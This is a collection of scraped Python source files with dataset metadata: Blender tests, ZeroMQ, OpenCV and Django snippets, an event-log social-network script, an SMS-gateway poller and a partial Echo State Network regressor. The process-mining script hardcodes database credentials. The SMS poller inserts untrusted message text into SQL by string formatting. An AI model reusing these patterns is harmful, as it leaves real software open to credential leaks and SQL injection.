Keep the executable path.\n unittest.main(argv=sys.argv[:1] + (sys.argv[sys.argv.index(\"--\") + 1:] if \"--\" in sys.argv else []))\n", "repo_name": "blender/blender", "sub_path": "tests/python/bl_animation_nla_strip.py", "file_name": "bl_animation_nla_strip.py", "file_ext": "py", "file_size_in_byte": 4839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10105, "dataset": "github-code", "pt": "61", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 9, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 12, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 15, "usage_type": "attribute"}, {"api_name": "bpy.ops.wm.read_factory_settings", "line_number": 20, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 20, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.new", "line_number": 22, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 22, "usage_type": "attribute"}, {"api_name": "bpy.data.meshes.new", "line_number": 22, "usage_type": "call"}, {"api_name": "bpy.context.collection.objects.link", "line_number": 23, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 23, "usage_type": "attribute"}, {"api_name": "bpy.data.actions.new", "line_number": 28, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 28, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 37, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.frame_set", "line_number": 46, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 46, "usage_type": "attribute"}, {"api_name": "bpy.context.evaluated_depsgraph_get", "line_number": 48, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 48, "usage_type": "attribute"}, {"api_name": "unittest.expectedFailure", "line_number": 71, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 113, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}, {"api_name": "sys.argv.index", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "6533914819", "text": "import zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.PULL)\nsocket.connect(\"tcp://127.0.0.1:5555\")\n\nwhile True:\n message = socket.poll(100)\n\n if message:\n print(f\"poller: {message}\")\n message = socket.recv()\n print(f\"recv: {message}\")\n else:\n print(\"still waiting\")\n", "repo_name": "karol-brejna-i/locust-experiments", "sub_path": "feeding-locusts/0mq-playground/push-pull/non-blocking-puller.py", "file_name": "non-blocking-puller.py", "file_ext": "py", "file_size_in_byte": 313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 172, "dataset": "github-code", "pt": "61", "api": [{"api_name": "zmq.Context", "line_number": 3, "usage_type": "call"}, {"api_name": "zmq.PULL", "line_number": 4, "usage_type": "attribute"}]} +{"seq_id": "25622851465", "text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport numpy as np\nimport cv2\n\nimg = None\npoint = None\n\ndef onTrackbarSlide(pos):\n global img, point\n gray = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2GRAY)\n ret, dst = cv2.threshold(gray, int(pos), 255, cv2.THRESH_BINARY)\n contours, hierarchy = cv2.findContours(dst, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n if contours:\n nomal_curves = []\n selected_curve = None\n selected_curve_distance = None\n i1_matched_curves = []\n i2_matched_curves = []\n i3_matched_curves = []\n if point != None:\n for contour 
in contours:\n                if selected_curve_distance == None:\n                    selected_curve = contour\n                    selected_curve_distance = cv2.pointPolygonTest(contour, point, True)\n                else:\n                    distance = cv2.pointPolygonTest(contour, point, True)\n                    if abs(selected_curve_distance) > abs(distance):\n                        nomal_curves.append(selected_curve)\n                        selected_curve = contour\n                        selected_curve_distance = distance\n                    else:\n                        nomal_curves.append(contour)\n\n            for contour in contours:\n                if cv2.matchShapes(contour, selected_curve, cv2.cv.CV_CONTOURS_MATCH_I1, 0) < 0.1:\n                    i1_matched_curves.append(contour)\n                if cv2.matchShapes(contour, selected_curve, cv2.cv.CV_CONTOURS_MATCH_I2, 0) < 0.1:\n                    i2_matched_curves.append(contour)\n                if cv2.matchShapes(contour, selected_curve, cv2.cv.CV_CONTOURS_MATCH_I3, 0) < 0.1:\n                    i3_matched_curves.append(contour)\n        else:\n            nomal_curves = contours\n\n        color = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)\n        cv2.drawContours(color, nomal_curves, -1, (0, 0, 0))\n        cv2.drawContours(color, [selected_curve], -1, (0, 0, 255))\n        cv2.imshow('Contours', color)\n\n        i1_matched = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)\n        cv2.drawContours(i1_matched, i1_matched_curves, -1, (0, 0, 255))\n        cv2.imshow('I1 Matched', i1_matched)\n\n        i2_matched = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)\n        cv2.drawContours(i2_matched, i2_matched_curves, -1, (0, 0, 255))\n        cv2.imshow('I2 Matched', i2_matched)\n\n        i3_matched = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)\n        cv2.drawContours(i3_matched, i3_matched_curves, -1, (0, 0, 255))\n        cv2.imshow('I3 Matched', i3_matched)\n\ndef onMouse(event, x, y, flags, param):\n    global point\n    if (event == 4):\n        point = (x, y)\n        onTrackbarSlide(cv2.getTrackbarPos('Threshold', 'Contours'))\n\ndef main(args):\n    global img\n    if len(args) != 2:\n        return -1\n    img = cv2.imread(args[1])\n    cv2.namedWindow('Contours')\n    cv2.namedWindow('I1 Matched')\n    cv2.moveWindow('I1 Matched', img.shape[1], 0)\n    cv2.namedWindow('I2 Matched')\n    cv2.moveWindow('I2 Matched', img.shape[1] * 2, 0)\n    cv2.namedWindow('I3 Matched')\n    cv2.moveWindow('I3 Matched', img.shape[1] * 3, 0)\n    cv2.createTrackbar('Threshold', 'Contours', 100, 255, onTrackbarSlide)\n    cv2.setMouseCallback('Contours', onMouse)\n    cv2.imshow('Contours', img)\n\n    onTrackbarSlide(0)\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n    return 0\n\nif __name__ == '__main__':\n    args = sys.argv\n    main(args)\n", "repo_name": "justice3120/opencv_sample", "sub_path": "8/8-6/3/sample.py", "file_name": "sample.py", "file_ext": "py", "file_size_in_byte": 3392, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.cvtColor", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.pointPolygonTest", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.pointPolygonTest", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.matchShapes", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.cv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.matchShapes",
"line_number": 39, "usage_type": "call"}, {"api_name": "cv2.cv", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.matchShapes", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.setMouseCallback", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 91, "usage_type": "attribute"}]} +{"seq_id": "26253551487", "text": "from datetime import datetime\n\n\nclass Serializer(object):\n \"\"\"Mixin for retrieving public fields of SQLAlchemy models\n in json-compatible format\"\"\"\n __public__ = None\n\n def get_dict(self, exclude=(), extra=()):\n \"Returns model's PUBLIC data for jsonify\"\n data = {}\n keys = self._sa_instance_state.attrs.items()\n public = self.__public__ + extra if self.__public__ else extra\n for k, field in keys:\n if public and k not in public: continue\n if k in exclude: continue\n value = self._serialize(field.value)\n if value:\n data[k] = value\n return data\n\n @classmethod\n def _serialize(cls, value, follow_fk=False):\n if isinstance(value, datetime):\n ret = value.isoformat()\n elif hasattr(value, '__iter__'):\n ret = [cls._serialize(v) for v in value]\n elif Serializer in value.__class__.__bases__:\n ret = value.get_public()\n else:\n ret = value\n return ret\n", 
"repo_name": "kirang89/youten", "sub_path": "api/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime", "line_number": 24, "usage_type": "argument"}]} +{"seq_id": "33619016279", "text": "# -*- coding: utf-8 -*-\nfrom django import template\nimport re\nimport django_settings\n\nregister = template.Library()\n\n\nclass ContextNode(template.base.TextNode):\n def __init__(self, s, var_name):\n super(ContextNode, self).__init__(s)\n self.var_name = var_name\n\n def render(self, context):\n if self.var_name:\n context[self.var_name] = self.s\n return ''\n return super(ContextNode, self).render(context)\n\n\n@register.tag\ndef settings(parser, token):\n var_name = None\n try:\n tag_name, arg = token.contents.split(None, 1)\n except ValueError:\n raise template.TemplateSyntaxError(\n \"%r tag requires arguments\" % token.contents.split()[0])\n m = re.search(r'(.*?) as (\\w+)', arg)\n if m:\n arg, var_name = m.groups()\n if not (arg[0] == arg[-1] and arg[0] in ('\"', \"'\")):\n raise template.TemplateSyntaxError(\n \"%r tag's argument should be in quotes\" % tag_name)\n return ContextNode(django_settings.get(arg[1:-1]), var_name)\n", "repo_name": "jqb/django-settings", "sub_path": "django_settings/templatetags/settings_tags.py", "file_name": "settings_tags.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 83, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.template.Library", "line_number": 6, "usage_type": "call"}, {"api_name": "django.template", "line_number": 6, "usage_type": "name"}, {"api_name": "django.template.base", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 9, "usage_type": "name"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 27, "usage_type": "call"}, {"api_name": "django.template", "line_number": 27, "usage_type": "name"}, {"api_name": "re.search", "line_number": 29, "usage_type": "call"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 33, "usage_type": "call"}, {"api_name": "django.template", "line_number": 33, "usage_type": "name"}, {"api_name": "django_settings.get", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "3655117037", "text": "import psycopg2\nimport pandas as pd\nimport networkx as nx\nimport numpy as np\nimport collections\nimport matplotlib.pyplot as plt\n\ndef filter_event_log(event_log, z):\n \"\"\"\n Filter the first z events for cases in the log\n (and delete the events of cases with less than z events)\n :param event_log: a df containing the event log\n :param z: the number of events to filter\n :return: a df containing the filtered event log\n \"\"\"\n event_log = event_log\n rio = []\n grouped = event_log.groupby('caseid')\n for name, group in grouped:\n if len(group) >= z:\n rio.append(group.iloc[:z])\n df = pd.concat(rio)\n df = df.sort_values('ts', ascending=[True])\n df = df.reset_index(drop=True)\n print(df)\n return df\n\n pass\n\ndef get_social_network_handoffs(event_log, z, x):\n \"\"\"\n Returns a (networkx) graph containing the\n work handoff social network of an event log\n :param event_log: a df containing the event log\n :param z: the number of events to filter\n :param x: the threshold of handoffs to consider edges\n :return: a social network of handoffs graph\n \"\"\"\n event_log = 
filter_event_log(event_log, z)\n grouped = event_log.groupby(['caseid'])\n g1 = nx.DiGraph()\n for name, group in grouped:\n activity_list = list(group['activity'])\n resource_list = list(group['resource'])\n edge = []\n hand_off = 0\n compare = activity_list[0]\n compare2 = resource_list[0]\n for i in range(len(resource_list)):\n if compare == activity_list[i]:\n hand_off +=1\n else:\n if compare2 == resource_list[i]:\n hand_off = 0\n del compare\n del compare2\n compare = activity_list[i]\n compare2 = resource_list[i]\n else:\n for j in range(hand_off):\n edge.append((compare2, resource_list[i]))\n hand_off = 0\n del compare\n del compare2\n compare = activity_list[i]\n compare2 = resource_list[i]\n result = collections.Counter(edge)\n for i in range(len(list(result.keys()))):\n if list(result.values())[i] >= x:\n g1.add_nodes_from([list(result.keys())[i][0], list(result.keys())[i][1]])\n g1.add_edge(list(result.keys())[i][0], list(result.keys())[i][1], weight=list(result.values())[i])\n node = list(g1.nodes)\n rio = []\n for i in range(len(node)):\n for j in range(1,len(node)):\n if nx.has_path(g1, node[i], node[j]) == False:\n rio.append((node[i], node[j]))\n print(rio)\n return g1\n pass\n\ndef preprocess_event_log(event_log, z):\n \"\"\"\n Returns a dataframe containing the event log\n filtered and preprocessed to create items\n :param event_log: a df containing the event log\n :param z: the number of events to filter\n :return: a df containing the filtered and preprocessed log\n \"\"\"\n event_log = filter_event_log(event_log,z)\n groups = event_log.groupby('activity', as_index=True)\n rio = []\n count = 0\n for case, group in groups:\n print(\"processing ...{0}/{1}\".format(count, len(groups)))\n count +=1\n group = group.reset_index(drop=True)\n group2 = group.copy()\n for i in range(len(group)):\n if i == 0:\n group.loc[i, 'ts'] = 0\n else:\n group.loc[i, 'ts'] = (group2.loc[i, 'ts'] - group2.loc[i - 1, 'ts']).seconds\n mean = np.mean(list(group.loc[:,'ts']))\n mean1 = np.mean(list(group.loc[:, 'reqamount']))\n for i in range(len(group)):\n if group.loc[i, 'ts'] < 0.4 * mean:\n group.loc[i, 'ts'] = 'SHORT'\n elif group.loc[i, 'ts'] < 0.65 * mean:\n group.loc[i, 'ts'] = 'MEDIUM'\n else:\n group.loc[i, 'ts'] = 'LONG'\n if group.loc[i, 'reqamount'] < 0.4*mean1:\n group.loc[i, 'reqamount'] = 'SMALL'\n elif group.loc[i, 'reqamount'] < 1.2*mean1:\n group.loc[i, 'reqamount'] = 'MEDIUM'\n else:\n group.loc[i, 'reqamount'] = 'LARGE'\n rio.append(group)\n\n\n new_log = pd.concat(rio)\n new_log = new_log.sort_values('id', ascending=[True])\n new_log = new_log[['caseid', 'apptype', 'activity', 'resource', 'reqamount', 'ts']].reset_index(drop=True)\n new_log = pd.get_dummies(new_log, columns = ['apptype', 'activity', 'resource', 'reqamount', 'ts'])\n grouped = new_log.groupby('caseid')\n rio = []\n for name, group in grouped:\n group = group.reset_index(drop=True)\n new_data = pd.DataFrame()\n for i in range(z):\n if i == 0:\n dict_1 = group.iloc[0].to_dict()\n new_data = pd.DataFrame.from_dict([dict_1])\n else:\n dict_1 = group.iloc[i].to_dict()\n new_data2 = pd.DataFrame.from_dict([dict_1])\n new_data = pd.merge(new_data, new_data2, on='caseid', suffixes=('_{0}'.format(i),'_{0}'.format(i+1)))\n rio.append(new_data)\n df = pd.concat(rio)\n df = df.reset_index(drop=True)\n print(df.head(10))\n return df\n\n pass\n\ndef get_item(event_log, z, case_id, attr_name, attr_value, event_pos):\n \"\"\"\n returns the item list associated with case_id\n :param event_log: a df containing the event log\n 
:param z: the number of events to filter\n    :param case_id: the id of the case to consider\n    :param attr_name: name of the attribute (e.g. \"resource\")\n    :param attr_value: the value of the attribute (e.g. \"user_34\")\n    :param event_pos: the position in the case of the event (events always ordered by timestamp, from earlier to later), NOT RELEVANT FOR CASE-LEVEL ATTRIBUTES\n    :return: a list of items for case case_id\n    \"\"\"\n\n    event_log = preprocess_event_log(event_log,z)\n    if '{0}_{1}_{2}'.format(attr_name, attr_value, event_pos) not in event_log.columns:\n        print('There is no {0}_{1}'.format(attr_value, event_pos))\n    else:\n        index = 0\n        for i in range(len(event_log)):\n            case_id1 = event_log.loc[i, 'caseid']\n            if case_id1 == case_id:\n                index = i\n        value = event_log.loc[index, '{0}_{1}_{2}'.format(attr_name, attr_value, event_pos)]\n        print('result : {0}'.format(value))\n    pass\ndef display_and_save(G, file_name, layout = \"fg\"):\n    \"\"\"\n    This function is given and allows you to (i) display a graph using matplotlib and (ii) save the graph\n    in a png file named \"file_name\"\n    :param G: the graph\n    :param file_name: the name of the file, e.g. \"graph\" will save the image in a file named \"graph.png\"\n    :param layout: the layout chosen to visualise the graph (default is fruchterman_reingold_layout)\n    \"\"\"\n\n    if layout == \"spring\":\n        pos = nx.spring_layout(G)\n    elif layout == \"shell\":\n        pos = nx.shell_layout(G)\n    elif layout == \"spectral\":\n        pos = nx.spectral_layout(G)\n    else:\n        pos = nx.fruchterman_reingold_layout(G)\n\n    # nodes\n    nx.draw_networkx_nodes(G, pos,\n                           nodelist=G.nodes(),\n                           node_color='r',\n                           node_size=500,\n                           alpha=0.8)\n\n    nx.draw_networkx_edges(G, pos,\n                           edgelist=G.edges(),\n                           width=2, alpha=0.5, edge_color='r')\n\n    labels = {}\n    i = 0\n    for node in G.nodes():\n        labels[node] = str(node)\n\n    nx.draw_networkx_labels(G, pos, labels, font_size=16)\n\n    plt.axis('off')\n    plt.savefig(file_name + \".png\") # save as png\n    plt.show() # display\n\nif __name__ == '__main__':\n    connection = psycopg2.connect(user=\"myuser064\",\n                                  password=\"064\",\n                                  host=\"114.70.14.56\",\n                                  port=\"10051\",\n                                  database=\"mydb\")\n    print(\"---Connecting to database...\")\n    cursor = connection.cursor()\n    print(\"---done.\\n\")\n\n    print(\"Running query 1...\\n\")\n    query1 = \"select * from {0}\".format('loans')\n    query1_output = query1\n    cursor.execute(query1_output, ('loans', id))\n    records1 = cursor.fetchall()\n\n    col_names = []\n    for desc in cursor.description:\n        col_names.append(desc[0])\n    cursor.close()\n\n    event_log = pd.DataFrame.from_records(list(records1), columns=col_names)\n    preprocess_event_log(event_log,13)\n    graph = get_social_network_handoffs(event_log,13,3)\n    display_and_save(graph, 'ko.png')\n\n    pass", "repo_name": "KyuHwan00/Data_Science_Programming-2", "sub_path": "Solution.py", "file_name": "Solution.py", "file_ext": "py", "file_size_in_byte": 8685, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.concat", "line_number": 22, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 41, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 67, "usage_type": "call"}, {"api_name": "networkx.has_path", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 122, "usage_type": "call"}, {"api_name":
"pandas.get_dummies", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 137, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 137, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 138, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 140, "usage_type": "call"}, {"api_name": "networkx.spring_layout", "line_number": 181, "usage_type": "call"}, {"api_name": "networkx.shell_layout", "line_number": 183, "usage_type": "call"}, {"api_name": "networkx.spectral_layout", "line_number": 185, "usage_type": "call"}, {"api_name": "networkx.fruchterman_reingold_layout", "line_number": 187, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_nodes", "line_number": 190, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_edges", "line_number": 196, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 212, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_records", "line_number": 232, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 232, "usage_type": "attribute"}]} +{"seq_id": "22146163654", "text": "import requests,pymysql,time\n\n# Connect to the database\nconnection = pymysql.connect(host='localhost',\n user='root',\n password='',\n db='sms_gateway',\n cursorclass=pymysql.cursors.DictCursor)\ncursor =connection.cursor()\n\n# url\n# url=\"http://192.168.43.1:8080/v1/sms\"\n\ndef checkApi(device):\n print(\"cek device %s..\" % device['id'])\n url=\"http://\"+device['ip_address']+\"/v1/sms\"\n # print(type(url))\n r = requests.get(url)\n response = r.json()\n # print(response)\n sql=\"SELECT max(id_message) as max FROM inbox where received_by=%s\"%device['id']\n # # print(url)\n cursor.execute(sql)\n # # return\n id = cursor.fetchone()\n # #\n # # # print(type(id['max']))\n # # # max=None\n if id['max'] is None :\n max=0\n else:\n max=id['max']\n # # print(type(max))\n #\n # # get result and filter max id\n result = response['messages']\n filter = [item for item in result if int(item['_id']) > max and item['msg_box']=='inbox']\n if filter:\n for message in filter:\n alert=''\n if (message['msg_box']=='inbox'):\n alert = \"Pesan Masuk dari %s\" % message['address']\n elif (message['msg_box']=='outbox'):\n alert = \"Pesan Terkirim ke %s\" % message['address']\n print(alert)\n\n # print(message)\n\n sql = 'INSERT INTO inbox values(null,\"%s\",\"%s\",\"%s\",\"%s\")' % (\n message['_id'], device['id'],message['address'], message['body'])\n\n # print(sql)\n cursor.execute(sql)\n connection.commit()\n connection.rollback()\n else:\n print(\"tidak ada pesan masuk di %s\"%device['id'])\ndef selectDevice():\n sql=\"select * from device\"\n 
cursor.execute(sql)\n devices=cursor.fetchall()\n # print(device)\n for device in devices:\n checkApi(device)\n connection.rollback()\nwhile 1:\n selectDevice()\n # checkApi()\n time.sleep(3)", "repo_name": "uripyogantara/sms-gateway", "sub_path": "messages.py", "file_name": "messages.py", "file_ext": "py", "file_size_in_byte": 2051, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymysql.connect", "line_number": 4, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 8, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "35540047622", "text": "#!/usr/bin/python3\n\"\"\"\nqueries the number of subscribers in a subreddit\n\"\"\"\nimport requests\n\n\ndef number_of_subscribers(subreddit):\n \"\"\"\n gets the number of subscribers in the subreddit given as an arg\n \"\"\"\n url = 'https://www.reddit.com/r/{}/about.json'.format(subreddit)\n headers = {'User-Agent': 'api-test by Namasaka'}\n res = requests.get(url, headers=headers, allow_redirects=False)\n\n # parse if request is successful\n if res.status_code == 200:\n res = res.json()\n return (res['data']['subscribers'])\n return 0\n", "repo_name": "NamasakaLennox/alx-system_engineering-devops", "sub_path": "0x16-api_advanced/0-subs.py", "file_name": "0-subs.py", "file_ext": "py", "file_size_in_byte": 557, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "44049346145", "text": "\"\"\"The :mod:`echo_state_network` contains an ESNRegressor and ESNClassifier.\"\"\"\n\n# Authors: Peter Steiner \n# License: BSD 3 clause\n\nfrom __future__ import annotations\nimport sys\nimport numpy as np\nfrom sklearn.base import (BaseEstimator, ClassifierMixin, RegressorMixin,\n MultiOutputMixin, is_regressor, clone)\nfrom sklearn.linear_model._base import LinearModel\n\nfrom ..base.blocks import InputToNode, NodeToNode\nfrom ..util import concatenate_sequences\nfrom ..linear_model import IncrementalRegression\nfrom ..projection import MatrixToValueProjection\nfrom sklearn.utils.validation import _deprecate_positional_args\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.exceptions import NotFittedError\n\nfrom joblib import Parallel, delayed\n\nif sys.version_info >= (3, 8):\n from typing import Union, Dict, Any, Optional, Literal\nelse:\n from typing_extensions import Literal\n from typing import Union, Dict, Any, Optional\n\n\nclass ESNRegressor(BaseEstimator, MultiOutputMixin, RegressorMixin):\n \"\"\"\n Echo State Network regressor.\n\n This model optimizes the mean squared error loss function\n using linear regression.\n\n Parameters\n ----------\n input_to_node : Optional[InputToNode], default=None\n Any ```InputToNode``` object that transforms the inputs.\n If ```None```, a ```pyrcn.base.blocks.InputToNode```\n object is instantiated.\n node_to_node : Optional[NodeToNode], default=None\n Any ```NodeToNode``` object that transforms the outputs of\n ```input_to_node```.\n If ```None```, a ```pyrcn.base.blocks.NodeToNode```\n object is instantiated.\n regressor : Union[IncrementalRegression, LinearModel, None], default=None\n Regressor object such as derived from ``BaseEstimator``. 
This\n regressor will automatically be cloned each time prior to fitting.\n If ```None```, a ```pyrcn.linear_model.IncrementalRegression```\n object is instantiated.\n requires_sequence : Union[Literal[\"auto\"], bool], default=\"auto\"\n If True, the input data is expected to be a sequence.\n If \"auto\", tries to automatically estimate when calling ```fit```\n for the first time\n decision_strategy : Literal[\"winner_takes_all\", \"median\", \"last_value\"],\n default='winner_takes_all'\n Decision strategy for sequence-to-label task. Ignored if the\n target output is a sequence\n verbose : bool = False\n Verbosity output\n kwargs : Any\n keyword arguments passed to the subestimators if this is desired,\n default=None\n \"\"\"\n\n @_deprecate_positional_args\n def __init__(self, *,\n input_to_node: Optional[InputToNode] = None,\n node_to_node: Optional[NodeToNode] = None,\n regressor: Union[IncrementalRegression,\n LinearModel, None] = None,\n requires_sequence: Union[Literal[\"auto\"], bool] = \"auto\",\n decision_strategy: Literal[\"winner_takes_all\", \"median\",\n \"last_value\"] = \"winner_takes_all\",\n verbose: bool = True,\n **kwargs: Any) -> None:\n \"\"\"Construct the ESNRegressor.\"\"\"\n if input_to_node is None:\n i2n_params = InputToNode()._get_param_names()\n self.input_to_node = InputToNode(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in i2n_params})\n else:\n i2n_params = input_to_node._get_param_names()\n self.input_to_node = input_to_node.set_params(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in i2n_params})\n if node_to_node is None:\n n2n_params = NodeToNode()._get_param_names()\n self.node_to_node = NodeToNode(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in n2n_params})\n else:\n n2n_params = node_to_node._get_param_names()\n self.node_to_node = node_to_node.set_params(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in n2n_params})\n if regressor is None:\n reg_params = IncrementalRegression()._get_param_names()\n self.regressor = IncrementalRegression(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in reg_params})\n else:\n reg_params = regressor._get_param_names()\n self.regressor = regressor.set_params(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in reg_params})\n self._regressor = self.regressor\n self._requires_sequence = requires_sequence\n self.verbose = verbose\n self.decision_strategy = decision_strategy\n\n def __add__(self, other: ESNRegressor) -> ESNRegressor:\n \"\"\"\n Sum up two instances of an ```ESNRegressor```.\n\n We always need to update the correlation matrices of the regressor.\n\n Parameters\n ----------\n other : ESNRegressor\n ```ESNRegressor``` to be added to ```self```\n\n Returns\n -------\n self : returns the sum of two ```ESNRegressor``` instances.\n \"\"\"\n self.regressor._K = self.regressor._K + other.regressor._K\n self.regressor._xTy = self.regressor._xTy + other.regressor._xTy\n return self\n\n def __radd__(self, other: ESNRegressor) -> ESNRegressor:\n \"\"\"\n Sum up multiple instances of an ```ESNRegressor```.\n\n We always need to update the correlation matrices of the 